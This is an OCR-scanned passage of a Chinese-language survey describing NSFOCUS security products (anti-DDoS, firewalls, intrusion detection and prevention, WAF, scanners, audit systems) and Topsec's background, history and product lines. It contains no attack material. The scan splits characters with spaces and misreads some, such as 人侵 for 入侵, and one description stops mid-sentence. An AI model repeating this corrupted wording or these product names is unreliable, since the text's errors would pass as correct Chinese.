绿 盟 抗拒 绝 服务 系统 管理 中 心 (NSFOCUS ADS-M, 原 叫 PAMADS) 是 绿 盟 科技 在 
原 有 ADS 和 NTA 产品 的 基础 上 ,进一步 融合 云 平 台 技术 ,推出 的 7X24 小 时 DDoS 攻 
击 防 御 解 决 方案 。 绿 盟 ADS with MSS 可 以 帮助 用 户 将 本 地 的 ADS 和 NTA 设备 (如 果 
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有 的 话 ) 与 绿 盟 安 全 云 对 接 和 同步 ,由 绿 盟 安全 专家 团队 协助 用 户 对 拒绝 服务 攻击 进行 
全 天 候 监 控 , 从 事前 检测 预防 、 事 中 响应 防护 、 事 后 持续 监控 的 角度 ,最 大 限度 减少 DDoS 
攻击 带 来 的 损失 ,同时 帮助 用 户 从 繁重 的 日 常安 全 维护 工作 中 解脱 出 来 ,让 用 户 能 够 专 
注 于 自身 核心 业务 的 发 展 。 

3) 绿 盟 NF 防火 墙 系统 

绿 盟 下 一 代 防 火 墙 (NSFOCUS NF) 是 绿 盟 科技 构筑 在 最 新 一 代 64 位 多 核 硬件 平台 
基础 之 上 ,采用 最 新 的 应 用 层 安全 防护 理念 ,同时 结合 先进 的 多 核 高 速 数据 包 并 发 处 理 
技术 ,研发 而 成 的 企业 级 下 一 代 边 界 安全 产品 。 其 核心 理念 是 立足 于 用 户 网 络 边界 , 建 
立 起 以 应 用 为 核心 的 网 络 安全 策略 和 以 内 网 资产 风险 识别 .云端 安全 管理 为 显著 特征 的 
全 方位 的 安全 防护 体系 。 

4) 绿 盟 网 络 人 侵 检测 系统 

绿 盟 科技 根据 多 年 攻防 积累 以 及 产品 研发 经 验 ,推出 了 新 一 代 绿 盟 网 络 人 侵 检 测 系 
统 (NSFOCUS Network Intrusion Detection System,NSFOCUS NIDS) , 绿 盟 NIDS 不 
但 具备 国内 领先 的 攻击 规则 特征 库 , 能 对 已 知 安全 威胁 进行 检测 ,而且 具备 持续 更 新 的 
信誉 特征 库 , 能 够 降低 未 知 的 恶意 软件 所 带 来 的 危害 ,同时 内 网 安全 功能 能 有 效 地 防止 
内 网 持续 渗透 ,有 效 降低 了 敏感 数据 的 泄露 和 服务 器 的 异常 外 联 。 该 产品 融合 高 性 能 、 
高 安全 性 ,高 可 靠 性 和 易 操作 性 等 特性 ,产品 具备 敏感 数据 外 发 检测 、 客 户 端 攻击 检测 、 
服务 器 非法 外 联检 测 .僵尸 网 络 检测 等 多 项 功能 。 

5) 绿 盟 网 络 人 侵 防 护 系统 

绿 盟 网 络 人 侵 防 护 系 统 (NSFOCUS Network Intrusion Prevention System， 
NSFOCUS NIPS) , 绿 盟 NIPS 不 但 具备 国内 领先 的 攻击 规则 特征 库 , 能 对 已 知 安全 威胁 
进行 防护 ,而 且 具 备 持续 更 新 的 信誉 特征 库 , 能 够 降低 未 知 的 恶意 软件 所 带 来 的 危害 , 同 
时 内 网 安全 功能 能 有 效 地 防止 内 网 持续 渗透 ,有 效 降低 了 敏感 数据 的 泄露 和 服务 器 的 异 
常 外 联 。 产 品 具 备 敏 感 数据 保护 、 客 户 端 防护 .服务 器 非法 外 联防 护 .僵尸 网 络 防护 等 多 
项 功能 ,能 够 为 用 户 提供 深度 攻击 防御 和 内 网 安全 保护 。 

6) 绿 盟 网 络 流量 分 析 系 统 

绿 盟 科技 网 络 流量 分 析 系 统 (NSFOCUS Network Traffic Analyzer, NSFOCUS 
NTA) 是 一 款 基 于 流 技术 的 骨干 网 流量 分 析 产 品 , 主 要 功能 包括 各 类 异常 流量 的 检测 及 
网 络 流量 的 统计 分 析 等 ,可 分 析 诸 如 DDoS 流量、 网 络 滥用 误 用 、 蠕 虫 爆 发 .P2P 流量 等 骨 
干 网 上 的 大 部 分 异常 流量 。 产 品 既 可 作为 独立 的 流量 分 析 系 统 进行 部 署 ,也 可 作为 异常 
流量 检测 产品 与 绿 盟 抗 拒绝 服务 产品 一 起 构成 抗 DDoS 攻击 的 一 体 化 解决 方案 。 产 品 
特性 主要 包括 有 先进 的 基线 生成 算法 .丰富 的 流量 异常 检测 .灵活 高 效 的 检测 .强大 的 处 
理性 能 、 即 插 即 用 。 

7) 绿 盟 威胁 分 析 系 统 

绿 盟 威胁 分 析 系 统 (TAC) 可 以 精确 检测 通过 网 页 .电子 邮件 或 文件 共享 方式 试图 进 
入 内 部 网 络 的 恶意 软件 ,包括 零 日 攻击 及 具有 抗 检测 能 力 的 高 级 恶意 软件 。 该 产品 的 特 
点 是 ,检测 已 知 和 零 日 攻击 , 抗 逃 避 能 力 强 ;检测 恶意 软件 全 生命 周期 活动 ;分 析 应 用 协 
议 及 文件 类 型 全 面 ;检测 精确 ;多 引擎 集成 ,提供 事件 响应 的 优先 排序 ;提供 闭环 的 纵深 
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解决 方案 等 。 

8) 绿 盟 Web 应 用 防火 墙 

绿 盟 科技 Web 应 用 防火 墙 (WAF) 将 客户 资产 作为 组 织 Web 安全 解决 方案 的 依据 ， 
用 黑 、 白 名 单机 制 相 结 合 的 完整 防护 体系 ,通过 精细 的 配置 将 多 种 Web 安全 检测 方法 连 
结 成 一 套 完 整 (COMPLETE) 的 解决 方案 ,并 整合 成 熟 的 DDoS 攻击 抵御 机 制 ,能 够 在 
IPV4、IPV6 及 二 者 混合 环境 中 抵御 OWASP Top 10 等 各 类 Web 安全 威胁 和 拒绝 服务 
攻击 ,并 以 较 低 的 运营 成 本 为 各 种 机 构 提 供 透明 在 线 部 署 . 路 由 旁 路 部 署 .镜像 部 署 和 云 
部 署 , 能 方便 快捷 的 部 署 上 线 ,保卫 Web 应 用 , 免 遭 当前 和 未 来 的 安全 威胁 。 

9) 绿 盟 Web 应 用 防护 系统 (可 管理 系列 ) 

绿 盟 Web 应 用 防护 系统 (可 管理 系列 ) (NSFOCUS WAF with MSS, 原 叫 
PAMWAF) 是 绿 盟 科技 在 原 有 WAF 产品 的 基础 上 ,进一步 融合 云 平台 技术 ,推出 的 7X24 
小 时 Web 应 用 安全 云 监 护 解决 方案 。 绿 盟 WAF with MSS 可 以 实现 将 用 户 本 地 WAF 
设备 与 绿 盟 安全 云 对 接 和 同步 ,由 绿 盟 安全 专家 团队 协助 用 户 对 网 站 安全 隐患 和 遭受 的 
攻击 威胁 进行 全 天 候 监控 ,从 事前 检测 预防 、 事 中 响应 防护 、 事 后 持续 监控 的 角度 ,最 大 
限度 降低 Web 应 用 安全 风险 。 

10) 绿 盟 数据 泄露 防护 系统 

绿 盟 数据 泄露 防护 系统 (NSFOCUS Data Loss Prevention System, NSFOCUS 
DLP),NSFOCUS DLP 基于 数据 存在 的 三 种 形态 (存储 、 使 用 ,传输 ) ,对 数据 生命 周期 中 
的 各 种 泄密 途径 进行 全 方位 的 监察 和 防护 ,保证 了 敏感 数据 泄露 行为 事前 能 被 发 现 , 事 
中 能 被 拦截 和 监察 ,事后 能 被 追溯 ,使 得 数据 泄露 行为 无 处 授 形 ,敏感 数据 无 径 可 出 。 


2. 安全 评估 类 


1) 绿 盟 安全 配置 核查 系统 

绿 盟 安全 配置 核查 系统 (NSFOCUS Benchmark Verification System, NSFOCUS 
BVS)。 该 产品 具备 完善 的 安全 配置 库 , 采 用 高 效 、 智 能 的 识别 技术 ,可 以 实现 对 网 络 资 
产 设备 自动 化 的 安全 配置 检测 、 分 析 , 并 提供 专业 的 安全 配置 建议 与 合 规 性 报表 。 该 系 
统 的 应 用 ,大 大 提高 了 安全 配置 检查 的 方便 性 、 准 确 性 ,在 节省 时 间 成 本 的 同时 ,让 安全 
配置 维护 工作 变 得 有 条 不 亲 而 且 简 单 、 易 于 操作 。 其 关键 功能 包括 : 产品 内 置 默认 设备 
和 系统 检查 模板 ,支持 按照 信息 安全 等 级 保护 要 求 进行 配置 核查 ;支持 多 种 协议 远程 登 
录 目 标 系统 进行 检查 ,支持 在 线 设备 安全 配置 核查 和 离线 设备 安全 配置 核查 ;安全 配置 
核查 过 程 只 检查 系统 配置 情况 ,不 对 系统 配置 进行 任何 修改 ,确保 业务 持续 性 和 业务 安 
全 ;支持 自 定义 安全 配置 检查 功能 ,支持 根据 信息 系统 安全 等 级 保护 要 求 对 系统 进行 配 
置 核查 ;提供 检查 过 程 行为 审计 ;提供 基于 角色 的 分 析 、 统 计 报 表 。 

2) 绿 盟 工控 漏洞 扫描 系统 

绿 盟 工控 漏洞 扫描 系统 (NSFOCUS Industrial Control Systems Vulnerability 
Scanning System,NSFOCUS ICSScan) 可 以 通过 远程 安全 检测 的 方式 ,批量 发 现 工控 设 
备 、 工 控 软 件 以 及 支撑 他 们 运行 的 服务 器 、 数 据 库 、 网 络 设 备 的 安全 风险 。 该 产品 覆盖 多 
样 的 工业 控制 系统 ,并 且 能 够 进行 可 视 化 工控 风险 展示 , 除 此 之 外 还 具有 完整 的 工控 资 
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产 管理 与 完善 的 漏洞 管理 流程 。 

3) 绿 盟 远程 安全 评估 系统 

绿 盟 远程 安全 评估 系统 (NSFOCUS Remote Security Assessment System， 
NSFOCUS RSAS) 是 绿 盟 科技 结合 多 年 的 漏洞 挖掘 和 安全 服务 实践 经 验 ,自主 研发 的 新 
一 代 漏 洞 管理 产品 , 它 高 效 、 全 方位 的 检测 网 络 中 的 各 类 脆弱 性 风险 ,提供 专业 .有 效 的 
安全 分 析 和 修补 建议 ,并 贴 合 安全 管理 流程 对 修补 效果 进行 审计 ,最 大 程度 减 小 受 攻击 
面 。 该 产品 将 多 种 检查 能 力 合 一 ,能 够 发 现 系统 各 类 安全 隐患 。 并 实现 闭环 安全 管理 ， 
促进 安全 管理 流程 实施 。 还 配备 有 丰富 的 漏洞 .配置 知识 库 , 有 灵活 的 部 署 方式 ,在 各 种 
网 络 环境 中 均 可 使 用 。 

4) 绿 盟 网 站 安全 监测 系统 

绿 盟 网 站 安全 监测 系统 (NSFOCUS WEB Security Monitoring System,NSFOCUS 
WSM) ,该 系统 能 够 根据 站 点 管理 者 的 监管 要 求 ,通过 对 目标 站 点 进行 不 间断 的 页 面 候 
取 , 分 析 、 匹 配 ,为 客户 的 互联 网 网 站 提供 远程 安全 监测 、 安 全 检查 、 实 时 告警 。 该 产品 能 
够 多 维度 、 高 频率 全 方位 洞察 站 点 群 的 各 项 风险 隐患 ,可 对 目标 站 点 进行 高 频率 的 风险 
监测 ,一 旦 发 生 高 危 安 全 事件 ,及 时 告警 ,第 一 时 间 帮 助 客户 降低 风险 。 并 且 可 以 远程 透 
明 监 测 ,无须 改 变现 有 网 站 结构 ,只 要 对 WSM 系统 简单 配置 ,就 可 对 用 户 网 站 远程 监 
测 ,无 须 部 署 任 何 代 理 设备 。 拥 有 可 视 化 、 全 局 视图 的 风险 度量 报告 ,展示 各 级 站 点 整体 
风险 状况 ,上 级 组 织 可 以 很 方便 查看 各 个 下 级 组 织 的 风险 情况 ,并 能 进行 平 级 组 织 的 风 
险 对 比 ,支持 各 种 趋势 分 析 、 汇 总 查看 。 还 具有 灵活 、 可 扩展 的 架构 设计 ,可 根据 监控 的 
站 点 规模 的 扩充 ,方便 扩展 设备 以 实现 监测 性 能 的 提升 。 

5) 绿 盟 Web 应 用 漏洞 扫描 系统 

绿 盟 Web 应 用 漏洞 扫描 系统 (NSFOCUS Web Vulnerability Scanning System， 
NSFOCUS WVSS) ,以 其 便捷 的 配置 .全面 快速 地 检测 能 力 和 多 环境 适应 性 成 为 Web 应 
用 安全 评估 的 利器 。 该 系统 可 自动 获取 网 站 包含 的 相关 信息 ,并 全 面 模拟 网 站 访问 的 各 
种 行为 ,比如 ,按钮 点 击 ` 鼠 标 移动 .表单 复杂 填充 等 ,通过 内 建 的 “安全 模型 "检测 Web 
应 用 系统 潜在 的 各 种 漏洞 ,同时 为 用 户 构 建 从 急 到 缓 的 修补 流程 ,满足 安全 检查 工作 中 
所 需要 的 高 效 性 和 准确 性 。 该 产品 采用 高 效 稳定 的 扫描 引擎 ,基于 嵌入 式 系统 平台 , 通 
过 内 核 级 优化 ,运用 智能 页 面 候 取 、 资 源 动态 调节 ,代理 缓存 机 制 和 实时 任务 调度 等 技 
术 , 实 现 了 对 大 规模 网 站 的 快速 .稳定 的 扫描 。 能 够 进行 全 面 的 Web 应 用 安全 检测 , 检 
测 范围 覆盖 了 各 企 事业 单位 的 门户 网 站 .电子 政务 的 互动 平台 和 政务 信息 公开 服务 系统 
等 ,覆盖 了 论坛 内容 管理 系统 (CMS) 和 电子 商务 应 用 系统 等 平台 。 还 采用 了 多 视角 风 
念 评估 模型 ,同时 提供 了 安全 评估 和 风险 自 评 两 种 模式 , 既 可 以 周期 性 的 进行 全 面 安 全 
检测 ,还 可 以 结合 实际 业务 系统 进行 深入 的 安全 评估 。 除 此 之 外 还 有 专家 级 统计 分 析 报 
告 ,融入 漏洞 修补 流程 和 漏洞 精确 定位 技术 , 既 可 以 展示 各 站 点 的 整体 风险 等 级 和 对 比 
风险 情况 ,还 可 以 直观 、 便 捷 地 查看 每 个 漏洞 的 详细 信息 及 修补 建议 ,很 好 地 帮助 用 户 分 
步骤 的 修补 漏洞 以 及 验证 修补 效果 。 
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3. 安全 监管 类 


1) 绿 盟 数据 库 审计 系统 

绿 盟 数据 库 审 计 系 统 C(NSFOCUS Database Audit System,DAS) 是 能 够 实时 监视 、 
记录 网 络 上 的 数据 库 活动 ,对 数据 库 操作 进行 细 粒 度 审 计 的 合 规 性 管理 系统 。 它 通过 对 
用 户 访问 数据 库 行 为 的 记录 、 分 析 和 汇报 ,用 来 帮助 用 户 事后 生成 合 规 报告 .事故 追根 淹 
源 , 同 时 加 强 内 外 部 网 络 行为 记录 ,提高 数据 资产 安全 。DAS 是 一 款 专业 、 实 时 进行 数据 
库 访问 监视 与 审计 的 数据 库 安全 设备 。 能 够 多 角度 分 析 数 据 库 活动 ,并 对 异常 的 行为 具 
有 告警 通知 .审计 记录 、 时 候 追 踪 分 析 功 能 。DAS 独立 于 数据 库 进 行 配置 和 部 署 , 这 种 方 
式 能 够 在 不 影响 数据 库 的 前 提 下 ,达到 安全 管理 的 目的 。DAS 支持 灵活 的 部 署 模式 , 包 
括 旁 路 和 多 级 部 署 模式 。 与 传统 数据 库 审计 产品 中 的 SQL 处 理 机 制 (依赖 于 正则 表达 
式 .字符 串 等 技术 识别 SQL) 不 同 ,DAS 完全 模拟 数据 库 的 词法 .语法 (lex/yacc) 解 析 , 可 
以 精准 、 智 能 的 识别 SQL 类 型 ,从 而 灵活 地 构建 行为 模型 ,上 且 能 够 快速 、 准 确 地 配置 和 定 
位 策略 。 此 外 ,通过 智能 的 SQL 识别 ,采用 启发 式 风险 评估 ,能 够 及 时 发 现 数据 库 操作 
的 潜在 风险 ,从 而 能 够 实现 事后 对 数据 库 操作 记录 进行 合 规 性 分 析 。 由 于 数据 库 系统 的 
庞大 和 复杂 ,数据 库 自身 存在 各 种 各 样 的 漏洞 ,出 于 应 用 系统 的 稳定 性 等 考虑 ,数据 库 系 
统 往往 不 能 及 时 升级 补丁 修复 漏洞 ,这 就 给 黑客 对 数据 库 的 攻击 提供 了 便利 条 件 。DAS 
通过 漏洞 攻击 特征 识别 技术 ,在 不 需要 数据 库 做 任何 补丁 .升级 工作 的 前 提 下 , 即 可 实现 
对 400 种 以 上 的 数据 库 漏 洞 攻击 行为 进行 准确 监测 ,及 时 告警 。DAS 能 够 通过 易 用 的 配 
置 ,达到 细 粒 度 访问 审计 配置 的 目的 ,直接 在 DAS 上 对 数据 库 用 户 权限 进行 细 粒 度 划 
分 ,对 于 违反 细 粒 度 策略 的 访问 行为 进行 审计 ,告警 ,从 而 确保 数据 库 操作 达到 合 规 性 
要 求 。 

2) 绿 盟 企业 安全 中 心 

云 安全 中 心 是 绿 盟 科技 推出 的 一 款 移动 终端 软件 , 它 能 帮助 用 户 及 时 地 获取 全 球 最 
新 安全 动态 ,接收 威胁 预警 ,以便 用 户 能 够 及 时 采取 措施 保障 网 络 与 信息 安全 。 其 中 设 
有 云 监 护 专区 ,通过 它 可 以 了 解 全国 Web 安全 威胁 态势 。 云 监护 专区 将 通过 实时 地 展 
示 当 前 安全 威胁 级 别 以 及 绿 盟 科技 在 全 国 范围 内 监测 到 的 DDoS 攻击 和 Web 应 用 攻击 
的 总 体 概 况 ,帮助 了 解 您 所 处 的 信息 安全 环境 。 还 有 云 安 全 中 心 ,提供 全 球 最 新 的 网 络 
安全 资讯 ,对 最 新 的 Web 漏洞 .软件 漏洞 .恶意 代码 与 POC/ 工 具 发 布 情况 进行 预警 。 让 
用 户 能 够 及 时 了 解 安 全 环境 ,及 时 了 解 潜在 的 安全 隐患 ,以 便 及 时 采取 预防 措施 保障 网 
络 安全 。 

3) 绿 盟 安全 审计 系统 

绿 盟 安全 审计 系统 (NSFOCUS Security Audit System,NSFOCUS SAS) 通 过 网 络 
数据 的 采集 、 分 析 、 识 别 , 实 时 动态 监测 通信 内 容 、 网 络 行为 和 网 络 流量 ,发 现 和 捕获 各 种 
敏感 信息 ,违规 行为 ,实时 报警 响应 ,全 面 记录 网 络 系统 中 的 各 种 会 话 和 事件 ,实现 对 网 
络 信息 的 智能 关联 分 析 、 评 估 及 安全 事件 的 准确 全 程 跟踪 定位 ,为 整体 网 络 安 全 策略 的 
制定 提供 权威 可 靠 的 支持 。 绿 盟 安 全 审计 系统 具有 三 大 功能 。 

(1) 内 容 审计 。NSFOCUS SAS 系统 提供 深入 的 内 容 审计 功能 ,可 对 网 站 访问 、 邮 
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件 收 发 .远程 终端 访问 ,数据库 访问 .数据 传输 .文件 共享 等 提供 完整 的 内 容 检测 .信息 还 
原 功 能 ;并 可 自 定 义 关键 字库 ,进行 细 粒 度 的 审计 追踪 。 

(2) 行为 审计 。NSFOCUS SAS 系统 提供 全 面 的 网 络 行为 审计 功能 ,根据 设 定 行为 
审计 策略 ,对 网 站 访问 .邮件 收发 .数据 库 访问 .远程 终端 访问 .数据 传输 ,文件 共享 、 网 络 
资源 滥用 (即时 通信 、 论坛 .在线 视频 、P2P 下 载 、 网 络 游戏 等 ) 等 网 络 应 用 行为 进行 监测 ， 
对 符合 行为 策略 的 事件 实时 告警 并 记录 。 

(3) 流量 审计 。NSFOCUS SAS 系统 提供 基于 协议 识别 的 流量 分 析 功 能 ,实时 统计 
出 当前 网 络 中 的 各 种 报 文 流 量 ,进行 综合 流量 分 析 , 为 流量 管理 策略 的 制定 提供 可 靠 
支持 。 

4) 绿 盟 安全 审计 系统 一 堡垒 机 系列 

绿 盟 安全 审计 系统 一 堡垒 机 系列 (NSFOCUS SAS-H Series ,简称 堡垒 机 ) 提供 一 套 
先进 的 运 维 安全 管控 与 审计 解决 方案 ,目标 是 帮助 企业 转变 传统 IT 安全 运 维 被 动 响应 
的 模式 ,建立 面向 用 户 的 集中 、 主 动 的 运 维 安全 管控 模式 ,降低 人 为 安全 风险 ,满足 合 规 
要 求 ,保障 企业 效益 。 绿 盟 安 全 审计 系统 一 堡垒 机 主要 有 三 大 功能 。 

(1) 集中 账号 管理 。 堡 人 垒 机 建立 基于 唯一 身份 标识 的 全 局 实名 制 管理 ,支持 统一 账 
号 管理 策略 ,实现 与 各 服务 器 、 网 络 设 备 等 无 缝 连接 ,集中 管理 主 账号 (普通 用 户 )、 从 账 
号 (目标 设备 系统 账号 ) 及 相关 属性 。 

(2) 集中 访问 控制 。 保 又 机 通过 集中 统一 的 访问 控制 和 细 粒 度 的 命令 级 授权 策略 ， 
确保 用 户 拥有 的 权限 是 完成 任务 所 需 的 最 小 权限 ,实现 集中 有 序 的 运 维 操作 管理 ,防止 
非法 .越权 访问 事件 发 生 。 

(3) 集中 安全 审计 。 基 于 唯一 身份 标识 ,堡垒 机 通过 对 用 户 从 登录 到 退出 的 全 程 操 
作 行 为 审计 ,监控 用 户 对 被 管理 设备 的 所 有 敏感 关键 操作 ,提供 分 级 告警 ,聚焦 关键 事 
件 ,实现 对 安全 事件 及 时 预警 发 现 ,准确 可 查 。 


44 北京 天 融 信 科技 股份 有 限 公 司 


北京 天 融 信 科技 股份 有 限 公司 (简称 天 融 信 ) ,是 中 国 领先 的 信息 安全 产品 与 服务 解 
决 方案 提供 商 。 基 于 创新 的 “可 信和 网 络 架构 ”以 及 业界 领先 的 信息 安全 产品 与 服务 ,天 融 
信 致 力 于 改善 用 户 网 络 与 应 用 的 可 视 性 、 可 用 性 、 可 控 性 和 安全 性 ,降低 安全 风险 ,创造 
业务 价值 。 


441 基本 情况 


1995 年 11 月 ,天 融 信 创 办 于 北京 市 海淀 区 中 关 村 。 从 1996 年 率先 推出 填补 国内 空 
白 的 自主 知识 产权 防火 墙 产 品 ,到 自主 研发 的 可 编程 ASIC 安全 芯片 ,到 云 时 代 超 百 G 
机 架 式 “ 擎 天 ”安全 网 关 , 天 融 信 连续 10 年 以 上 位 居中 国信 息 安全 市 场 防 火 墙 .安全 网 
关 、 安 全 硬件 第 一 ,天 融 信 始终 引领 和 见证 着 中 国信 息 安全 产业 发 展 的 每 一 个 里 程 碑 。 
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442 发 展 历程 


1995 年 11 月 ,天 融 信 创 办 于 北京 市 海淀 区 中 关 村 。 

1996 年 6 月 ,成 功 研 制 出 我 国 第 一 套 自主 版 权 的 防火 墙 系统 ,填补 了 国内 空白 。 

2001 年 2 月 ,天 融 信 安全 产品 走出 国门 ,分 别 在 瑞士 .波兰 .意大利 等 一 百 多 个 国家 
和 地 区 安装 使 用 。 

2003 年 1 月 ,公司 销售 额 突 破 亿 元 ,开创 国内 安全 行业 发 展 的 里 程 碑 。 

2004 年 2 月 , 据 国际 数据 公司 (IDC) 数 据 统 计 ,2003 年 下 半年 ,天 融 信 防火 墙 产 品 市 
场 份 额 达到 了 17. 28% ,在 国内 外 安全 厂商 中 处 于 领先 地 位 ,改变 了 国内 厂商 一 直 处 于 弱 
势 的 局 面 ,创造 了 中 国 网 络 安全 界 又 一 里 程 碑 。 同 年 12 月 ,被 国际 著名 咨询 机 构 
Deloitte 评 为 “2004 年 亚太 高 科技 成 长 企业 500 强 ”。 同 年 12 月 ,推出 “可 信和 网 络 架 构 
(TNA)”, 并 得 到 中 国信 息 产业 商会 信息 安全 产业 分 会 倡导 及 推广 。 

2005 年 9 月 ,入 选 电子 政务 100 强 企业 ,并 成 为 第 一 家 跨 入 前 十 强 的 网 络 安全 企业 。 
同年 10 月 ,荣获 2005 中 国 网 络 主管 调查 “中 国 最 具 影 响 力 信息 安全 解决 方案 提供 商 ”。 

2006 年 2 月 被 中 国电 子 信息 产业 发 展 研究 院 评 为 "2005 一 2006 中 国 网 络 安全 产品 
市 场 最 具 价值 企业 ”。 同 年 10 月 ,推出 中 国 第 一 台 自 主 知识 产权 的 ASIC 防火 墙 ， 猜 豹 ” 
横 空 出 世 。 

2007 年 9 月 ,率先 发 布 可 信 并 行 计 算 安全 平台 及 万 兆 防火 墙 产 品 。 

2008 年 9 月 ,天 融 信 作 为 中 国信 息 安全 的 领导 企业 成 功 人 围 榜 单 , 喜 获 中 国 软件 业 
收入 百 强 企业 称号 。 

2009 年 10 月 ,天 融 信 为 新 中 国 成 立 六 十 周年 庆典 活动 信息 安全 保驾 护航 。 

2010 年 4 月 ,天 融 信 获得 2010 年 中 国 计 算 机 安全 大 会 年 度 突出 贡献 奖 。 同 年 5 月 ， 
天 融 信 荣获 “首届 中 关 村 自主 创新 示范 企业 ”称号 .并 人 选中 关 村 “十 百 千 工程 ”>。 同 年 7 
月 ,天 融 信 多 核 多 级 超 百 G 安全 网 关 “ 擎 天 ”发 布 会 在 北京 隆重 召开 , 擎 天 引领 了 云 时 代 
安全 网 关 产 品 的 发 展 方向 。 

2011 年 4 月 ,IDC《 中 国 IT 安全 市 场 分 析 (2010 年 )》 报 告 数 据 显 示 ,2010 年 中 国防 
火 墙 /VPN 硬件 市 场 中 ,天 融 信 以 16. 8% 的 市 场 份额 遥遥 领先 ,连续 数 年 位 居 市 场 占有 
率 第 一 位 。 同 年 8 月 ,天 融 信 顺 利信 选 CNCERT 国家 级 网 络 安全 应 急 服务 支撑 单位 。 

2013 年 1 月 ,天 融 信 获 得 国家 “党 政 科技 进步 一 等 奖 (省 部 级 )”。 标 志 着 天 融 信 产品 
的 技术 领先 性 ,天 融 信 产品 技术 继续 领跑 国内 信息 安全 市 场 。 同 年 11 月 ,天 融 信 通 过 
TL9000 电信 业 质 量 管理 认证 ,成 为 国内 第 一 家 通过 TL9000 的 专业 安全 设备 供应 商 , 标 
志 着 天 融 信 公司 在 质量 管理 体系 方面 已 达到 电信 行业 质量 标准 。 

2014 年 1 月 ,安全 就 是 攻防 能 力 的 较量 。 在 国家 信息 安全 漏洞 共享 平台 2013 年 全 
年 统计 漏洞 信息 排名 中 ,天 融 信 以 前 三 名 的 身份 荣获 国家 互联 网 应 急 中 心 CCNCERT)、 
国家 信息 安全 漏洞 共享 平台 (CNVD) 联 合 颁发 的 2013 年 漏洞 信息 报 送 突出 贡献 单位 的 
光荣 称号 。 同 年 6 月 ,根据 IDC、CCID 报告 数据 显示 ,天 融 信 在 硬件 防火 墙 市 场 领域 继 
续 排 名 第 一 ,并 在 整体 网 络 安全 硬件 市 场 竞争 力 分 析 中 遥遥 领先 ,延续 了 此 前 连续 10 余 
年 的 行业 领军 品牌 地 位 。 
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443 主要 产品 


天 融 信安 全 产品 主要 分 为 七 类 ,分 别 是 : 用 户 与 终端 安全 、 数 据 保护 、 边 界 安全 、 业 务 
交付 、Web 安全 、 合 规 审计 、 安 全 管理 等 。 


1. 用 户 与 终端 安全 


1) 主机 监控 与 审计 TopDesk 

天 融 信 网 络 卫 士 主机 监控 与 审计 系统 TopDesk 是 第 三 代 终 端 管理 系统 ,在 具备 补 
丁 管理 , 准 入 控制 .存储 介质 (U 盘 等 ) 管 理 ,非法 外 联 管理 等 功能 基础 上 ,增加 风险 管理 
和 主动 防范 机 制 , 具 备 完善 的 违规 监测 和 风险 分 析 , 实 现 有 效 防护 和 控制 ,降低 风险 ,并 
指导 持续 改进 和 完善 防护 策略 。 

2) 移动 存储 介质 管理 

天 融 信 移动 存储 介质 管理 系统 是 基于 天 融 信 “可 信和 网 络 架构 ?而 开发 的 安全 策略 的 
移动 存储 介质 管理 产品 ,系统 采用 B/S 与 C/S 相 结 合 的 管理 构架 。 系 统 以 用 户 作 为 主 
体 ,移动 存储 介质 作为 客体 ,主机 作为 执行 者 ,可 以 提供 对 移动 存储 介质 的 管理 和 控制 ， 
借助 于 注册 登记 、 授 权 使 用 .介质 保护 等 多 种 技术 手段 对 移动 存储 介质 进行 安全 管理 。 

3) 网 络 卫士 集中 身份 管理 系统 TopUTS 

天 融 信 推 出 的 统一 身份 管理 系统 ,通过 对 企业 的 用 户 和 系统 资源 进行 集中 身份 管 
理 、 集 中 认证 管理 ,集中 授权 管理 和 集中 审计 管理 ,让 企业 应 用 系统 的 访问 方式 更 加 简 
便 、 安 全 ,大 幅 提升 企业 的 整体 生产 力 和 工作 效率 。 


2. 数据 保护 


1) 容 灾 系 统 

天 融 信 容 灾 系 统 是 对 业务 性 要 求 极 高 的 企业 提供 的 业务 高 可 用 容 灾 解决 方案 ,具有 
为 客户 提供 业务 数据 零 丢失 ,业务 高 可 用 的 功能 。 支 持 Windows、Linux 和 UNIX 等 操 
作 系 统 平台 。 用 户 通 过 选择 相应 的 产品 版 本 , 即 可 为 企业 中 数据 库 服务 器 以 及 关键 业务 
的 应 用 服务 器 提供 快速 ,可 靠 和 完整 的 数据 备份 和 业务 接管 。 该 系统 采用 国际 上 先进 的 
TureCDP 技术 对 数据 进行 实时 同步 ,并 提供 了 粒度 无 限 的 恢复 点 ,不 仅 可 以 实现 数据 无 
丢失 的 功能 ,还 可 以 实现 数据 任意 回 退 的 功能 。 该 系统 采用 底层 驱动 复制 技术 进行 数据 
实时 增 量 传输 ,实现 对 客户 生产 服务 器 性 能 无 影响 。 该 系统 提供 智能 业务 切换 功能 , 采 
用 先进 的 虚拟 地 址 漂移 技术 ,为 客户 提供 自动 或 手动 的 业务 切换 ,从 而 实现 生产 业务 的 

2) 备份 存储 系统 

天 融 信 备 份 存 储 系统 是 一 种 集 备份 、 磁 盘 阵列 (FC SAN/IPSAN/NAS) .虚拟 带 库 等 
功能 为 一 体 的 软 、 硬 件 一 体 化 备份 平台 。 天 融 信 备份 存储 系统 包含 一 整套 阶梯 式 产品 ， 
完全 可 以 服务 于 各 种 不 同 级 别 的 数据 备份 存储 需求 。 天 融 信 备份 存储 系统 可 采用 
SATA 、SAS、SSD 等 多 种 磁盘 ,提供 FC 光纤 ,万 兆 以 太 网 以 及 千 兆 以 太 网 的 扩展 卡 以 满 
足 用 户 不 同 的 应 用 需求 。 
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3) 数据 防 泄露 系统 

TopNDLP 是 由 天 融 信 公司 开发 具有 自主 知识 产权 的 真正 的 数据 防 泄 露 产 品 。 可 满 
足 PCS DSS、SOX、HIPAA 等 法 规 的 数据 安全 要 求 , 也 可 满足 国内 安全 法 规 要 求 以 及 企 
业内 部 规定 的 符合 机 密 样本 的 数据 的 安全 要 求 。 其 以 集中 策略 为 基础 ,采用 深层 内 容 分 
析 , 对 静态 数据 、 动 态 数据 和 使 用 中 的 数据 进行 识别 、 监 控 \ 保 护 的 产品 。 

4) 文档 安全 管理 系统 

TDSM-DSM 是 一 款 功能 强大 且 易 于 使 用 的 文档 安全 管理 软件 ,该 系统 可 采用 128、 
256 位 高 强度 加 密 算法 实时 加 密 文件 ,综合 集成 了 动态 文档 加 密 技术 、 身 份 认证 技术 、 硬 
件 绑 定 技术 等 多 种 技术 对 指定 类 型 的 文件 进行 实时 、 强 制 . 透 明 的 加 解密 。 并 能 对 文档 
进行 细 分 化 的 权限 设置 ,确保 加 密 信息 在 特定 授权 范围 内 进行 指定 操作 。 通 过 文档 强制 
加 密 和 实时 权限 控制 ,为 企业 提供 安全 授权 下 的 机 密 信息 共享 机 制 ,有 效 防止 数据 丢失 
